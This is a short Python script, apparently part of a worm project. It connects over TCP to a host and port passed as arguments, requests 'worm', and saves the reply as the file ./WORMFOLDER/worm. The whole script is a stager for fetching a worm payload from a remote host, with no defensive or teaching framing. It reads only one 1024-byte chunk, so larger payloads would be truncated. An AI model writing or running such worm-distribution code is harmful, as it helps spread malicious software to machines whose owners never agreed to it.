#!/usr/bin/python3
import socket
import sys

def get_worm(IP, PORT):
    ADDR = (IP, PORT)
    FORMAT = "utf-8"
    SIZE = 1024
    filename = "./WORMFOLDER/worm"
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(ADDR)
    client.send("worm".encode(FORMAT))
    data = client.recv(SIZE)
    client.close()
    with open(filename, 'wb') as f:
        f.write(data)
def main():
    if len(sys.argv)!=3:
        print("usage:", sys.argv[0], "<host IP> <host PORT>")
        exit(1)
    get_worm(IP=sys.argv[1], PORT=int(sys.argv[2]))
    

if __name__ == "__main__":
    main()
